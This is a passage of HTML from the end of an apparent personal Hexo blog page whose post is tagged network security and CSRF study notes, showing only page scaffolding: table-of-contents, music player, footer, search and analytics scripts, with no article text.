                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-10-29
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" class="post-category">
                                    网络安全
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">
                        <span class="chip bg-color">学习笔记</span>
                    </a>
                    
                    <a href="/tags/CRSF/">
                        <span class="chip bg-color">CRSF</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2020-2021</span>
            
            <span id="year">2020</span>
            <a href="/about" target="_blank">YeOrLuOp</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">18.8k</span>&nbsp;字
            
            
            
            
            
            
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2020";
                    var startMonth = "08";
                    var startDate = "15";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/wang468" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>















</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
